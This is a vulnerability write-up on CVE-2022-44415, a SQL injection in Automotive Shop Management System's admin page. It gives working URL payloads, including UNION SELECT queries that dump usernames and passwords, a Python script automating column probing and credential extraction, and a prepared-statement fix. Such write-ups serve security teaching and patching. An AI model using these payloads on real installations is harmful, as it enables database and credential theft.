Automotive Shop Management System (ASMS) v1. is an open-source PHP web application for managing automotive service shops. A SQL injection vulnerability (CVE-2022-44415) exists in its administrative backend: the id parameter of the mechanic-detail page is placed straight into a database query, so an authenticated admin can rewrite that query to read, and in the worst case modify, the application's database, including stored credentials.
This write-up explains what CVE-2022-44415 is, shows how the flaw works, and walks through how an attacker would exploit it, in plain language.
- Vulnerability Type: SQL Injection
- Affected URL: /asms/admin/mechanics/view_mechanic.php?id=
- Affected Version: Automotive Shop Management System v1. (possibly earlier/later)
- Access Required: an authenticated admin session. The flaw sits behind the admin login, so on its own it is a post-authentication escalation from "can use the admin panel" to "can read the whole database"; it becomes more serious when chained with anything that yields admin credentials.
SQL injection occurs when user-controlled input (a form field, a URL parameter) is concatenated into a SQL statement, so that the input is interpreted as part of the query rather than as a plain value. Here the id parameter of the admin backend is spliced into the query unchanged, so whoever controls that parameter controls the rest of the WHERE clause.
Here is a stripped-down version of the problem code inside view_mechanic.php:
<?php
// ... authentication code ...
include '../../db_connect.php';

if (isset($_GET['id'])) {
    $id = $_GET['id'];
    // VULNERABLE: $id comes straight from the query string and is interpolated
    // into the SQL text, unquoted and unvalidated.
    $qry = $conn->query("SELECT * FROM mechanics where id = $id");
    $mechanic = $qry->fetch_assoc();
    // ... rest of the page ...
}
?>
The key problem:
The variable $id is copied from the request into the SQL string without validation, binding, or escaping. Note that it is interpolated unquoted (id = $id rather than id = '$id'), so even a string-escaping function such as mysqli_real_escape_string() would not help here: the attacker never has to break out of a quote, they simply append SQL after the number.
Suppose an attacker, logged in as an admin, accesses this URL:
https://example.com/asms/admin/mechanics/view_mechanic.php?id=1
They could instead request (spaces shown unencoded for readability; a browser or tool sends them as %20 or +):
https://example.com/asms/admin/mechanics/view_mechanic.php?id=1 OR 1=1
Which produces the following SQL:
SELECT * FROM mechanics where id = 1 OR 1=1
This matches every row in the mechanics table, not just the one with id=1. Because the page calls fetch_assoc() once, it still renders a single mechanic, so the visible effect can be subtle. A cleaner confirmation is a pair of boolean conditions: id=1 AND 1=1 should show the mechanic and id=1 AND 1=2 should show nothing, which proves the WHERE clause is under the attacker's control.
Extracting Data
Once the condition is controllable, a UNION-based payload appends a second SELECT whose output is rendered in place of the mechanic's fields. The number of columns must match the mechanics table; probe it by increasing the count (UNION SELECT 1, then 1,2, and so on, or ORDER BY n) until the database stops returning a column-count error. For example, to read the current database user with ten columns:
https://example.com/asms/admin/mechanics/view_mechanic.php?id=1 UNION SELECT 1,user(),3,4,5,6,7,8,9,10--
If the column count matches, the output of user() appears on the page in whichever field corresponds to the second column. Two practical notes: since the page shows only the first fetched row, use an id that does not exist (id=-1 UNION ...) so the injected row is the one rendered; and nothing follows $id in the query, so the trailing comment marker is optional. If you do use one, remember that MySQL requires whitespace after -- (send -- - or %23, i.e. #).
Assuming a users table with username and password columns (verify the names through information_schema before relying on them), the same technique dumps account credentials:
https://example.com/asms/admin/mechanics/view_mechanic.php?id=1 UNION SELECT 1,username,password,4,5,6,7,8,9,10 FROM users--
Adjust the table name and column positions to the real schema; table and column names can themselves be read from information_schema.tables and information_schema.columns with the same UNION technique.
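To make the mechanics of the two sections above concrete, here is an added, self-contained Python model of the flaw (example code written for this page, not ASMS's own code or a copy of view_mechanic.php). It stands in for the PHP/MySQL page with sqlite3 and an in-memory database whose schema and rows are constructed for the example (the real ASMS column names are not assumed). It shows the vulnerable string-built query beside the parameterised fix, the boolean true/false check, the column-count probing that the text leaves to the reader, and the UNION dump of a users table. SQLite has no user() function, so the extraction step reads the users table instead, and no comment terminator is appended since nothing follows the id in the query.

```python
import sqlite3

# Constructed sample schema standing in for the ASMS database. The column
# names, row contents and the 'users' table are assumptions for this example.
SCHEMA = """
CREATE TABLE mechanics (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT, contact TEXT);
INSERT INTO mechanics VALUES (1, 'Ana', 'Silva', '555-0101'), (2, 'Ben', 'Okoro', '555-0102');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_mechanic_vulnerable(conn, raw_id):
    """Mirror of view_mechanic.php: the id value is interpolated into the SQL
    text unquoted, so whatever it contains becomes part of the statement."""
    sql = f"SELECT * FROM mechanics where id = {raw_id}"
    return conn.execute(sql).fetchall()


def view_mechanic_fixed(conn, raw_id):
    """Parameterised version (the PHP fix with bind_param): the statement text
    is fixed and the value travels separately, so '1 OR 1=1' is compared as a
    single value that matches no id."""
    return conn.execute("SELECT * FROM mechanics where id = ?", (raw_id,)).fetchall()


def where_clause_controlled(conn):
    """Boolean confirmation: a true condition appended to a valid id should
    still return the row, a false one should return nothing."""
    true_rows = view_mechanic_vulnerable(conn, "1 AND 1=1")
    false_rows = view_mechanic_vulnerable(conn, "1 AND 1=2")
    return len(true_rows) == 1 and len(false_rows) == 0


def find_column_count(conn, max_cols=20):
    """Probe the number of columns a UNION must supply: each attempt appends
    'UNION SELECT 1,2,...,n' and the database errors until n is right."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            view_mechanic_vulnerable(conn, f"1 UNION SELECT {cols}")
            return n
        except sqlite3.OperationalError:
            # column-count mismatch; try one more
            continue
    return None


def dump_users(conn, ncols):
    """UNION-based extraction of username/password from the (assumed) users
    table, placed in result columns 2 and 3 with the rest padded. The id -1
    matches no mechanic, so the injected rows are the only ones returned,
    which matters on a page that renders just the first fetched row."""
    padding = ",".join(str(i) for i in range(4, ncols + 1))
    extra = f",{padding}" if padding else ""
    payload = f"-1 UNION SELECT 1,username,password{extra} FROM users"
    rows = view_mechanic_vulnerable(conn, payload)
    return [(row[1], row[2]) for row in rows]


if __name__ == "__main__":
    db = connect()
    print("id=1 OR 1=1 rows:", len(view_mechanic_vulnerable(db, "1 OR 1=1")))
    print("where clause controlled:", where_clause_controlled(db))
    ncols = find_column_count(db)
    print("column count:", ncols)
    print("dumped users:", dump_users(db, ncols))
    print("fixed query with same payload:", view_mechanic_fixed(db, "1 OR 1=1"))
```

Running it shows the string-built query returning both mechanics for `1 OR 1=1`, the probe settling on four columns, the users table contents coming back through the mechanics page, and the parameterised query returning nothing for the same payload. Against the real application the probing loop would watch the HTTP response instead of catching a driver exception, and the column count would be whatever the mechanics table actually has.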
Reference Links
- CVE-2022-44415 at NVD
- Exploit-DB #51354
- YouTube video PoC
- Official ASMS download page (for testing)
How to Fix
Never interpolate user input into SQL.
Use a prepared statement with a bound parameter, so the database receives the query structure and the value separately:
$id = $_GET['id'];
// The statement text is fixed; the value is sent separately and can never
// change the query's structure.
$stmt = $conn->prepare("SELECT * FROM mechanics WHERE id = ?");
$stmt->bind_param("i", $id);   // "i": bind as an integer
$stmt->execute();
$mechanic = $stmt->get_result()->fetch_assoc();   // get_result() needs the mysqlnd driver
As a second layer, coerce the input to an integer before it gets anywhere near the query. Note that intval() coerces rather than validates: it turns 1 OR 1=1 into 1 and abc into 0, so the injection is neutralised but silently, and a request with a bad id will look up mechanic 0 instead of being rejected.
$id = intval($_GET['id']);
Bind every user-supplied value; input validation is a useful extra check, not a substitute for binding.
Anyone running ASMS v1. should apply this fix to view_mechanic.php immediately, check the other backend pages that read an id from the query string for the same pattern, or update to a fixed version if one becomes available.
For further reading, see the references above!
Stay safe—never trust user input, not even in your admin backend.
*Authored for automatic systems and security learners, 2024.*
Timeline
Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:57:00 UTC